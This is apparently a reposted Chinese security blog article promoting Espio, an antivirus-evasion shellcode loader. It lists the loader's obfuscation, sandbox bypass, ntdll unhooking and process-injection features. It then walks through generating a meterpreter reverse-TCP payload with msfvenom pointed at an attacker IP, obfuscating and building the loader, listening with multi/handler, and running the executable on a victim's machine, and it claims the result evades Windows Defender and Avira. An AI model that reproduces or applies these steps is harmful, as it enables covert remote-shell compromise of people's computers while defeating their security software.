【免杀系列】Espio 过小红伞、AV
2023-6-17 14:47:47 Author: Ots安全(查看原文) 阅读量:39 收藏

特征
  • 混淆 - 使用随机生成的密钥进行 base64 编码和 XOR 加密。

  • Sandbox Bypass - 自定义休眠功能。

  • DLL Unhooking - ntdll.dll 的完全脱钩

  • 进程注入 - 将有效负载注入 werfault.exe

用法

1.克隆存储库:

git clone https://github.com/Konis-Bros/Espio.git

2.生成Shell代码。在此演示中,我们将在 kali 机器中使用 msfvenom:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode

3.将shellcode放入克隆的仓库中,使用obfuscator.py工具进行混淆:

python3 obfuscator.py shellcode

注意:然后我们的 shellcode 使用key.bin密钥被混淆为obfuscatedPayload.bin并保存在 loader/Espio 中。

4.打开 loader/Espio.sln,Visual Studio 解决方案文件。

5.构建项目。请注意,可执行文件将位于 loader/x64/Debug/Espio.exe。

6.在攻击者的机器上,侦听定义端口上的 TCP 连接。在我们的例子中,在端口 1337 上运行 metasploit 的 multi/handler。

7.将可执行文件放到受害者的机器上并运行它。

建议

  • 在第 2 步和第 6 步中,通过 HTTPS 创建 meterpreter 会话。有关详细信息,请参阅Meterpreter HTTP/HTTPS 通信。
  • 在第 5 步中,将构建配置从 Debug 更改为 Release。请注意,可执行文件现在位于 loader/x64/Release/Espio.exe。
测试
Espio 接受了以下检查:
Windows Defender的:

小红伞 Prime:


AV

项目地址:

https://github.com/Konis-Bros/Espio

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247498890&idx=2&sn=2d77e2682e689607ff8270affbac03a0&chksm=9badb5c1acda3cd7e9727fe24646402162afa8eb56c1b5dbf1dd05d8dcb6e603aaab083bd30a#rd
如有侵权请联系:admin#unsafe.sh